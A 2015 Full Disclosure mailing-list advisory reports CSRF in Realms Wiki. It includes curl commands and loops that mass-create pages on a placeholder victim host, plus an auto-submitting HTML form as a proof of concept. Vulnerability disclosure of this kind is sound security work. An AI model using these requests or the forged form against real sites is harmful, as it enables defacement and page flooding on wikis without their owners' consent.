[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] CSRF in Realms Wiki
From:       Javantea <jvoss () altsci ! com>
Date:       2015-03-25 23:04:03
Message-ID: 20150325230403.5AA0226C83 () mail ! altsci ! com
[Download RAW message or body]

CSRF in Realms Wiki
Vulnerability Report
Mar 19, 2015

Product:  Realms Wiki
Website:  http://realms.io/
Github:   https://github.com/scragg0x/realms-wiki
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)

Realms Wiki is vulnerable to Cross-Site Request Forgery on all posts. Especially of concern are \
New, Edit, and Revert. If Realms Wiki had significant authentication mechananisms such as site \
administration, user administration, and so forth, these too would be vulnerable to CSRF and \
the harm would be increased. A command-line example of the post to create a new page is as \
simple as:

curl 'http://wiki.victim.example.com/test' --data \
'name=test&message=passwords+and+stuff&content=%60%60%60%0A123456%0Apassword%0Alove%0Asex%0Asecret%0Agod%0A%60%60%60%0A'


To create 600 pages:

for i in $(seq 2 600); do curl -i 'http://wiki.victim.example.com/test'"$i" --data \
'name=test'"$i"'&message=passwords+and+stuff&content=csrf+is+fun'"$i"; done

To create a page for every word in the dictionary:
while read word; do curl -i 'http://wiki.victim.example.com/'"$word" --data \
'name='"$word"'&message=csrf&content=did+you+know+'"$word"; done </usr/share/dict/words

The repro for the CSRF is:

<html>
<body onLoad="document.forms[0].submit();">
<form action="http://wiki.victim.example.com/csrf-awesome" method="POST">
<input type="hidden" name="name" value="csrf_awesome" />
<input type="hidden" name="message" value="whatever data we want" />
<input type="hidden" name="content" value="csrf is fun 1234" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

Disclosure Timeline:
Found:              Thu, Mar 19, 2015
Reported to author: Thu, Mar 19, 2015
Full Disclosure:    Thu, Mar 25, 2015

The reason I have chosen to advance the timeline beyond what most people consider reasonable is \
because I reported a difficult to exploit remote code execution vulnerability to the author on \
Sun, 15 Mar 2015 and heard no response. Today makes 10 days since I reported the vulnerability \
and I have heard nothing back. Therefore I am using full-disclosure to warn users that their \
sites can be CSRFed. I am also posting the remote code execution vulnerability along with this \
(which is lower severity due to the difficulty in exploitation).

Thanks to those who have written this wiki. It's well-written and will need some bug fixes. I \
plan on making many improvements to this wiki in the future.

Regards,
Javantea

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic